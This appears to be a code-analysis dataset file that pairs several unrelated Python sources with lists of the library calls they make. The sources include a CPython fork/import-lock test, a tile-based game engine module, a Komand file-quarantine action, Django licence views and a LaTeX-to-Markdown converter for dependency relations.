[((162, 185), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (183, 185), False, 'from rest_framework import routers\n'), ((240, 263), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (261, 263), False, 'from rest_framework import routers\n'), ((344, 402), 'django.urls.path', 'path', (['"""search_chat"""', 'views.search_chat'], {'name': '"""search_chat"""'}), "('search_chat', views.search_chat, name='search_chat')\n", (348, 402), False, 'from django.urls import path\n'), ((408, 472), 'django.urls.path', 'path', (['"""fetch_my_chat"""', 'views.fetch_my_chat'], {'name': '"""fetch_my_chat"""'}), "('fetch_my_chat', views.fetch_my_chat, name='fetch_my_chat')\n", (412, 472), False, 'from django.urls import path\n'), ((478, 554), 'django.urls.path', 'path', (['"""fetch_latest_talk"""', 'views.fetch_latest_talk'], {'name': '"""fetch_latest_talk"""'}), "('fetch_latest_talk', views.fetch_latest_talk, name='fetch_latest_talk')\n", (482, 554), False, 'from django.urls import path\n'), ((560, 627), 'django.urls.path', 'path', (['"""fetch_all_talk"""', 'views.fetch_all_talk'], {'name': '"""fetch_all_talk"""'}), "('fetch_all_talk', views.fetch_all_talk, name='fetch_all_talk')\n", (564, 627), False, 'from django.urls import path\n'), ((633, 732), 'django.urls.path', 'path', (['"""fetch_chat_with_user_id"""', 'views.fetch_chat_with_user_id'], {'name': '"""fetch_chat_with_user_id"""'}), "('fetch_chat_with_user_id', views.fetch_chat_with_user_id, name=\n 'fetch_chat_with_user_id')\n", (637, 732), False, 'from django.urls import path\n'), ((733, 785), 'django.urls.path', 'path', (['"""post_talk"""', 'views.post_talk'], {'name': '"""post_talk"""'}), "('post_talk', views.post_talk, name='post_talk')\n", (737, 785), False, 'from django.urls import path\n'), ((791, 908), 'django.urls.path', 'path', (['"""fetch_chat_unread_total_count/"""', 'views.fetch_chat_unread_total_count'], {'name': '"""fetch_chat_unread_total_count"""'}), "('fetch_chat_unread_total_count/', views.fetch_chat_unread_total_count,\n name='fetch_chat_unread_total_count')\n", (795, 908), False, 'from django.urls import path\n'), ((910, 1009), 'django.urls.path', 'path', (['"""reset_chat_unread_count"""', 'views.reset_chat_unread_count'], {'name': '"""reset_chat_unread_count"""'}), "('reset_chat_unread_count', views.reset_chat_unread_count, name=\n 'reset_chat_unread_count')\n", (914, 1009), False, 'from django.urls import path\n'), ((1010, 1147), 'django.urls.path', 'path', (['"""fetch_chat_list_for_chat_list_page"""', 'views.fetch_chat_list_for_chat_list_page'], {'name': '"""fetch_chat_list_for_chat_list_page"""'}), "('fetch_chat_list_for_chat_list_page', views.\n fetch_chat_list_for_chat_list_page, name=\n 'fetch_chat_list_for_chat_list_page')\n", (1014, 1147), False, 'from django.urls import path\n')]
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import threading
import time
import unittest
from test.fork_wait import ForkWait
from test import support
# Skip test if fork does not exist.
support.get_attribute(os, 'fork')
class ForkTest(ForkWait):
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
exitcode = 42
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(exitcode)
else:
if support.verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid, exitcode=exitcode)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
exitcode = 42
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if support.verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(exitcode)
self.wait_impl(pid, exitcode=exitcode)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
def tearDownModule():
support.reap_children()
if __name__ == "__main__":
import unittest
unittest.main()
|
[
"unittest.main",
"test.support.reap_children",
"test.support.get_attribute",
"threading.Thread",
"time.sleep",
"os.kill",
"os._exit",
"threading.Event",
"os.fork",
"_imp.acquire_lock",
"_imp.release_lock"
] |
[((253, 286), 'test.support.get_attribute', 'support.get_attribute', (['os', '"""fork"""'], {}), "(os, 'fork')\n", (274, 286), False, 'from test import support\n'), ((3244, 3267), 'test.support.reap_children', 'support.reap_children', ([], {}), '()\n', (3265, 3267), False, 'from test import support\n'), ((3320, 3335), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3333, 3335), False, 'import unittest\n'), ((470, 487), 'threading.Event', 'threading.Event', ([], {}), '()\n', (485, 487), False, 'import threading\n'), ((934, 967), 'threading.Thread', 'threading.Thread', ([], {'target': 'importer'}), '(target=importer)\n', (950, 967), False, 'import threading\n'), ((1052, 1061), 'os.fork', 'os.fork', ([], {}), '()\n', (1059, 1061), False, 'import os\n'), ((642, 660), '_imp.acquire_lock', 'imp.acquire_lock', ([], {}), '()\n', (658, 660), True, 'import _imp as imp\n'), ((765, 781), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (775, 781), False, 'import time\n'), ((903, 921), '_imp.release_lock', 'imp.release_lock', ([], {}), '()\n', (919, 921), True, 'import _imp as imp\n'), ((1968, 1996), 'os.kill', 'os.kill', (['pid', 'signal.SIGKILL'], {}), '(pid, signal.SIGKILL)\n', (1975, 1996), False, 'import os\n'), ((2980, 2998), 'os._exit', 'os._exit', (['exitcode'], {}), '(exitcode)\n', (2988, 2998), False, 'import os\n'), ((1432, 1450), 'os._exit', 'os._exit', (['exitcode'], {}), '(exitcode)\n', (1440, 1450), False, 'import os\n'), ((1603, 1614), 'os._exit', 'os._exit', (['(1)'], {}), '(1)\n', (1611, 1614), False, 'import os\n'), ((2562, 2571), 'os.fork', 'os.fork', ([], {}), '()\n', (2569, 2571), False, 'import os\n'), ((2480, 2498), '_imp.acquire_lock', 'imp.acquire_lock', ([], {}), '()\n', (2496, 2498), True, 'import _imp as imp\n'), ((2705, 2723), '_imp.release_lock', 'imp.release_lock', ([], {}), '()\n', (2721, 2723), True, 'import _imp as imp\n'), ((2905, 2916), 'os._exit', 'os._exit', (['(1)'], {}), '(1)\n', (2913, 2916), False, 'import os\n')]
|
from .Layers import Layer,TileLayer,FXLayer
from Lib import Vector,Img
from Engine import Items
from . import Tiles,Player
from random import shuffle
from Objects import War
V=Vector.VectorX
exp=Img.sndget("bomb")
class Area(object):
backcol=(0,0,0)
infinite=False
large=False
explored=()
building=None
anitick=0
ebuffer=0
emax=10
def __init__(self,bounds,generator,building):
self.bounds=bounds
self.layers=[TileLayer(16,"Tiles"),Layer(16,"Ore"),Layer(16,"Overlay"),Layer(16,"Conv"),Layer(16,"Items"),Layer(0,"Objects"),Layer(-32,"Air"),FXLayer("FX")]
self.ldict = {l.name: l for l in self.layers}
self.ups=set()
self.mups=set()
self.targets=set()
self.gen=generator
self.building=building
if not self.large:
generator.generate(self)
def spawn(self,nobj,pos):
for l in nobj.layers:
self.ldict[l][pos]=nobj
if nobj.updates:
self.ups.add((pos,nobj))
if nobj.targetable:
self.targets.add(nobj)
if nobj.coords:
nobj.coords.area=self
nobj.coords.pos=pos
else:
nobj.coords=Vector.Coordinate(self,pos)
nobj.on_spawn(self,pos)
return nobj
def spawn_new(self,oc,pos,*args):
return self.spawn(oc(Vector.Coordinate(self,pos),*args),pos)
def spawn_item(self,item,pos):
self.spawn_new(Items.ItemObject,pos,item)
def set_tile(self,tile,pos):
self.ldict["Tiles"][pos]=Tiles.tdict[tile]
def dest(self,layer,pos):
tobj=self.ldict[layer][pos]
self.dobj(tobj,pos)
def dobj(self,obj,pos):
if obj:
for l in obj.layers:
self.ldict[l].del_obj(pos)
obj.on_dest(self,pos)
if (pos,obj) in self.ups:
self.ups.remove((pos,obj))
if obj in self.targets:
self.targets.remove(obj)
def super_dest(self,pos):
for l in self.layers:
if l!="Tiles":
self.dest(l.name,pos)
def move(self,obj,pos,d,warped=False,override_speed=None,tpos_cache=None,re_layer=None):
tpos = tpos_cache or pos + d
tlayers=re_layer or obj.layers
if not self.infinite and not tpos.within(self.bounds):
if self.building and (not self.large or "Air" in obj.layers):
warp=self.building.out_warp(self,pos,d)
if warp:
return self.warp(warp, obj, pos, d,warped,override_speed)
return False
blocked=False
for l in tlayers:
o=self.get(l, tpos)
if o:
blocked=True
warp=o.in_warp(d)
if warp:
return self.warp(warp,obj,pos,d,warped,override_speed)
elif isinstance(obj,Items.ItemObject) and o.input(d,obj.item):
if not warped:
self.dobj(obj, pos)
for l in obj.layers:
self.ldict[l].outobjs[tpos] = obj
obj.lmo = -d
obj.mprog = 64
obj.aspeed = override_speed or obj.mspeed
self.mups.add(obj)
return True
if blocked or not self.supported(obj, tpos):
return False
if not warped:
self.dobj(obj,pos)
if re_layer:
obj.lmo=-d-V(0,(self.ldict[re_layer[0]].off-self.ldict[obj.layers[0]].off)/64)
obj.layers=re_layer
else:
obj.lmo = -d
self.spawn(obj, tpos)
if warped:
for l in obj.layers:
self.ldict[l].outobjs[tpos] = obj
obj.mprog=64
obj.aspeed=override_speed or obj.mspeed
return True
def warp(self,warp,obj,pos,d,warped,ospeed):
if warp.area.move(obj, warp.pos - d, d, True,ospeed):
if not warped:
self.dobj(obj, pos)
for l in obj.layers:
self.ldict[l].outobjs[pos + d] = obj
return True
return False
def render(self,surf,player,pos):
sr=surf.get_rect()
start, size = pos - V(sr.w // 128 + 1, sr.h // 128 + 2), V(sr.w // 64 + 2, sr.h // 64 + 3)
poss=list(size.iter_space_2d(start))
for l in self.layers:
l.render(surf,poss,start,-player.moveoff-V(64,128),self,player)
def update(self,events):
for p,o in set(self.ups):
o.update(p,self,events)
for p,o in self.ups:
o.mupdate()
for o in set(self.mups):
o.mupdate()
if not o.mprog:
self.mups.remove(o)
for l in self.layers:
l.update()
self.anitick+=1
self.anitick%=64
def de_update(self,obj,pos):
self.ups.remove((pos,obj))
obj.updates=False
def supported(self,obj,tpos):
if obj.slayer:
s=self.get(obj.slayer,tpos)
if bool(s and s.support)==obj.inverse_support:
return False
return True
def get(self,layer,pos):
return self.ldict[layer][pos]
def clear(self,layer,pos):
return (self.infinite or pos.within(self.bounds)) and not self.get(layer,pos)
def warped(self,pos,d):
return False
def has_player(self):
for p,o in self.ups:
if o.area:
if o.area.has_player():
return True
if o.name=="Player":
return True
def respawn(self,p):
locs=list(self.bounds.iter_space_2d(Vector.zero))
shuffle(locs)
for tpos in locs:
if self.clear("Objects",tpos):
self.spawn(p,tpos)
return
raise RuntimeError("COULD NOT SPAWN PLAYER ANYWHERE")
def create_exp(self, fpos, r, exps,exptier=1, expeffect=None):
if exps == "Cross":
self.explode(fpos,exptier,expeffect)
for dpos in Vector.vdirs:
pos = fpos + dpos
for n in range(r):
if not self.explode(pos,exptier, expeffect):
break
pos += dpos
elif exps == "Square":
for pos in [fpos + v - V(r, r) for v in (V(r, r) * 2 + V(1, 1)).iter_space()]:
self.explode(pos, expeffect)
elif exps == "Circle":
for pos in [fpos + v - V(r, r) for v in (V(r, r) * 2 + V(1, 1)).iter_space()]:
if (fpos - pos).rlen < r + 0.5:
self.explode(pos, expeffect)
exp.play()
def explode(self, pos,exptier, expeffect=None):
rt=False
for l in self.layers:
o=self.get(l.name,pos)
if (not o or o.explode(self,pos,exptier)) and l.name=="Objects":
rt=True
if rt:
self.add_exp(pos,expeffect)
return rt
def add_exp(self, pos, expeffect):
se = True
# if expeffect == "Nuclear" and not randint(0, 2):
# self.change_t(pos, "RadGoop")
# elif expeffect == "Incendiary" and randint(0, 3):
# self.spawn(Enemies.Fire(pos))
# se = False
if se:
self.spawn_new(War.Explosion,pos)
def get_power(self,needed):
prov=min(needed,self.ebuffer)
self.ebuffer-=prov
return prov
def generate(self,gfunc):
if self.large:
return 0
self.ebuffer+=gfunc(self.emax-self.ebuffer)
def __getitem__(self, item):
return self.ldict[item]
class LargeArea(Area):
large = True
def __init__(self,bounds,generator,planet):
super().__init__(bounds,generator,planet)
self.explored=set()
def render(self,surf,player,pos):
sr=surf.get_rect()
start, size = pos - V(sr.w // 128 + 1, sr.h // 128 + 2), V(sr.w // 64 + 2, sr.h // 64 + 3)
poss=list(size.iter_space_2d(start))
for v in poss:
self.ping(v)
for l in self.layers:
l.render(surf,poss,start,-player.moveoff-V(64,128),self,player)
def ping(self,pos):
if pos not in self.explored:
if pos.within(self.bounds):
self.gen.gen_pos(self,pos)
self.explored.add(pos)
def get(self,layer,pos):
self.ping(pos)
return self.ldict[layer][pos]
class InfiniteArea(Area):
infinite = True
large = True
def __init__(self,generator):
super().__init__(None,generator,None)
self.explored=set()
def render(self,surf,player,pos):
sr=surf.get_rect()
start, size = pos - V(sr.w // 128 + 1, sr.h // 128 + 2), V(sr.w // 64 + 2, sr.h // 64 + 3)
poss=list(size.iter_space_2d(start))
for v in poss:
self.ping(v)
for l in self.layers:
l.render(surf,poss,start,-player.moveoff-V(64,128),self,player)
def ping(self,pos):
if pos not in self.explored:
self.gen.gen_pos(self,pos)
self.explored.add(pos)
def get(self,layer,pos):
self.ping(pos)
return self.ldict[layer][pos]
|
[
"Lib.Img.sndget",
"random.shuffle",
"Lib.Vector.Coordinate"
] |
[((195, 213), 'Lib.Img.sndget', 'Img.sndget', (['"""bomb"""'], {}), "('bomb')\n", (205, 213), False, 'from Lib import Vector, Img\n'), ((5649, 5662), 'random.shuffle', 'shuffle', (['locs'], {}), '(locs)\n', (5656, 5662), False, 'from random import shuffle\n'), ((1204, 1232), 'Lib.Vector.Coordinate', 'Vector.Coordinate', (['self', 'pos'], {}), '(self, pos)\n', (1221, 1232), False, 'from Lib import Vector, Img\n'), ((1351, 1379), 'Lib.Vector.Coordinate', 'Vector.Coordinate', (['self', 'pos'], {}), '(self, pos)\n', (1368, 1379), False, 'from Lib import Vector, Img\n')]
|
import komand
from .schema import StopAndQuarantineFileInput, StopAndQuarantineFileOutput
# Custom imports below
class StopAndQuarantineFile(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='stop_and_quarantine_file',
description='Stop execution of a file on a machine and delete it',
input=StopAndQuarantineFileInput(),
output=StopAndQuarantineFileOutput())
def run(self, params={}):
self.logger.info("Running...")
machine_id = params.get("machine_id")
sha1_id = params.get("sha1")
comment = params.get("comment")
self.logger.info("Attempting to stop and quarantine file: " + sha1_id)
self.logger.info("Attempting to stop and quarantine file on machine: " + machine_id)
response = self.connection.stop_and_quarantine_file(machine_id, sha1_id, comment)
return {"stop_and_quarantine_response": komand.helper.clean(response)}
# def test(self):
# # TODO: Implement test function
# return {}
|
[
"komand.helper.clean"
] |
[((973, 1002), 'komand.helper.clean', 'komand.helper.clean', (['response'], {}), '(response)\n', (992, 1002), False, 'import komand\n')]
|
from wildlifelicensing.apps.applications.models import Application
from wildlifelicensing.apps.dashboard.views import officer
from wildlifelicensing.apps.main.models import WildlifeLicence
from wildlifelicensing.apps.returns.models import Return
class DataTableApplicationView(officer.DataTableApplicationsOfficerView):
def get_initial_queryset(self):
return Application.objects.filter(applicant_profile__user=self.args[0]).exclude(processing_status='draft')
class DataTableLicencesView(officer.DataTableLicencesOfficerView):
def get_initial_queryset(self):
return WildlifeLicence.objects.filter(holder=self.args[0])
class DataTableReturnsView(officer.DataTableReturnsOfficerView):
def get_initial_queryset(self):
return Return.objects.filter(licence__holder=self.args[0]).exclude(status='future')
|
[
"wildlifelicensing.apps.main.models.WildlifeLicence.objects.filter",
"wildlifelicensing.apps.returns.models.Return.objects.filter",
"wildlifelicensing.apps.applications.models.Application.objects.filter"
] |
[((593, 644), 'wildlifelicensing.apps.main.models.WildlifeLicence.objects.filter', 'WildlifeLicence.objects.filter', ([], {'holder': 'self.args[0]'}), '(holder=self.args[0])\n', (623, 644), False, 'from wildlifelicensing.apps.main.models import WildlifeLicence\n'), ((373, 437), 'wildlifelicensing.apps.applications.models.Application.objects.filter', 'Application.objects.filter', ([], {'applicant_profile__user': 'self.args[0]'}), '(applicant_profile__user=self.args[0])\n', (399, 437), False, 'from wildlifelicensing.apps.applications.models import Application\n'), ((763, 814), 'wildlifelicensing.apps.returns.models.Return.objects.filter', 'Return.objects.filter', ([], {'licence__holder': 'self.args[0]'}), '(licence__holder=self.args[0])\n', (784, 814), False, 'from wildlifelicensing.apps.returns.models import Return\n')]
|
import re
import sys
depRelHeader="""\
## %s : %s
"""
oneDepFig="""
<div class="sd-parse">
%s
%s(%s, %s)
</div>
"""
header="""\
---
layout: base
title: '%(relname)s'
shortdef : '%(shortdef)s'
---
"""
footer=""
### {\emph{advcl}: adverbial clause modifier}
relRe=re.compile(r"\{\\emph\{(.*?)\}:\s+(.*)\}\\\\$") #matches "advcl" and "adverb....ier" as two groups
### tabbing fig text
### \> ``Sam took out a 3 million dollar loan'' \> \> \emph{amod}(loan, dollar)\\
tabFigLine=re.compile(r"\\> +``(.*?)'' +\\> *\\> +\\emph\{(.*?)\}\((.*?), ?(.*?)\) *\\\\")
### \begin{deptext}[column sep=0.2em] Sam \&, \& my \& brother \& , \& arrived \\ \end{deptext}
depTextRe=re.compile(r"\\begin\{deptext\}(\[.*?\])? *(.*?)\\end\{deptext\}")
#\depedge[edge unit distance=0.5ex]{1}{4}{appos}
depEdgeRe=re.compile(r"\\depedge(\[.*?\])?\{([0-9]+)\}\{([0-9]+)\}\{(.*?)\}")
punctRe=re.compile(r"([.,!?])(?=( |$))")
class Relation:
"""I hold everything related to one relation in here, in case I want to
reorder them somehow, etc..."""
def __init__(self,name,definition):
self.name=name
self.definition=definition
self.text=depRelHeader%(name,definition)
def readDepFig(self,textIn):
# \begin{dependency}
# \begin{deptext}[column sep=0.2em]
# Sam \&, \& my \& brother \& , \& arrived \\
# \end{deptext}
# \depedge[edge unit distance=0.5ex]{1}{4}{appos}
# \end{dependency}
lines=""
while True:
line=textIn.next().strip()
if line==r"\end{dependency}":
break
lines+=" "+line
m=depTextRe.search(lines)
tokens=[t.strip() for t in m.group(2).replace(r"\\","").strip().split(r"\&")]
txt=" ".join(tokens)
self.text+="""\n\n<div class="sd-parse">\n"""
self.text+=txt+"\n"
for m in depEdgeRe.finditer(lines):
src=int(m.group(2))
target=int(m.group(3))
dType=m.group(4)
self.text+=dType+"("+tokens[src-1]+"-"+str(src)+", "+tokens[target-1]+"-"+str(target)+")\n"
self.text+="""</div>\n\n"""
def readTabbingFig(self,textIn):
while True:
line=textIn.next().strip()
if line.startswith(r"\hspace"):
continue
match=tabFigLine.match(line)
if match:
txt,dType,g,d=match.groups()
print >> sys.stderr, txt
txt=punctRe.sub(r" \1",txt).replace(r"\\","")
g=g.replace("\\","")
d=d.replace("\\","")
print >> sys.stderr, txt
print >> sys.stderr
self.text+=oneDepFig%(txt,dType,g,d)
continue
if line==r"\end{tabbing}":
return
print >> sys.stderr, "Spurious line: >>>"+line+"<<<"
def getText(self):
t=self.text
emphRe=re.compile(r"\\emph\{(.*?)\}")
t=emphRe.sub(r"*\1*",t)
quoteRe=re.compile(r"``(.*?)''")
t=quoteRe.sub(r'"\1"',t)
return t
relations={} #relType -> Relation()
currRel=None
while True:
try:
line=sys.stdin.next().strip()
except StopIteration: #Done!
break
#New relation?
match=relRe.search(line)
if match: #new relation
currRel=Relation(*match.groups())
assert currRel.name not in relations
relations[currRel.name]=currRel
continue
#Figure in tabbing?
if line.startswith(r"\begin{tabbing}"):
currRel.readTabbingFig(sys.stdin)
continue
if line.startswith(r"\begin{dependency}"):
currRel.readDepFig(sys.stdin)
continue
if line.startswith("%ENDRELS"):
break
if line.startswith("%") or line.startswith(r"\begin") or line.startswith(r"\end"):
continue
if currRel:
currRel.text+=line+" "
for r in sorted(relations):
f=open("../_en/"+r+".md","wt")
print >> f, header%{"relname":r,"shortdef":relations[r].definition}
print >> f, relations[r].getText()
print >> f, footer
f.close()
|
[
"sys.stdin.next",
"re.compile"
] |
[((271, 328), 're.compile', 're.compile', (['"""\\\\{\\\\\\\\emph\\\\{(.*?)\\\\}:\\\\s+(.*)\\\\}\\\\\\\\\\\\\\\\$"""'], {}), "('\\\\{\\\\\\\\emph\\\\{(.*?)\\\\}:\\\\s+(.*)\\\\}\\\\\\\\\\\\\\\\$')\n", (281, 328), False, 'import re\n'), ((486, 590), 're.compile', 're.compile', (['"""\\\\\\\\> +``(.*?)\'\' +\\\\\\\\> *\\\\\\\\> +\\\\\\\\emph\\\\{(.*?)\\\\}\\\\((.*?), ?(.*?)\\\\) *\\\\\\\\\\\\\\\\"""'], {}), '(\n "\\\\\\\\> +``(.*?)\'\' +\\\\\\\\> *\\\\\\\\> +\\\\\\\\emph\\\\{(.*?)\\\\}\\\\((.*?), ?(.*?)\\\\) *\\\\\\\\\\\\\\\\"\n )\n', (496, 590), False, 'import re\n'), ((673, 748), 're.compile', 're.compile', (['"""\\\\\\\\begin\\\\{deptext\\\\}(\\\\[.*?\\\\])? *(.*?)\\\\\\\\end\\\\{deptext\\\\}"""'], {}), "('\\\\\\\\begin\\\\{deptext\\\\}(\\\\[.*?\\\\])? *(.*?)\\\\\\\\end\\\\{deptext\\\\}')\n", (683, 748), False, 'import re\n'), ((799, 875), 're.compile', 're.compile', (['"""\\\\\\\\depedge(\\\\[.*?\\\\])?\\\\{([0-9]+)\\\\}\\\\{([0-9]+)\\\\}\\\\{(.*?)\\\\}"""'], {}), "('\\\\\\\\depedge(\\\\[.*?\\\\])?\\\\{([0-9]+)\\\\}\\\\{([0-9]+)\\\\}\\\\{(.*?)\\\\}')\n", (809, 875), False, 'import re\n'), ((876, 907), 're.compile', 're.compile', (['"""([.,!?])(?=( |$))"""'], {}), "('([.,!?])(?=( |$))')\n", (886, 907), False, 'import re\n'), ((2904, 2937), 're.compile', 're.compile', (['"""\\\\\\\\emph\\\\{(.*?)\\\\}"""'], {}), "('\\\\\\\\emph\\\\{(.*?)\\\\}')\n", (2914, 2937), False, 'import re\n'), ((2983, 3006), 're.compile', 're.compile', (['"""``(.*?)\'\'"""'], {}), '("``(.*?)\'\'")\n', (2993, 3006), False, 'import re\n'), ((3143, 3159), 'sys.stdin.next', 'sys.stdin.next', ([], {}), '()\n', (3157, 3159), False, 'import sys\n')]
|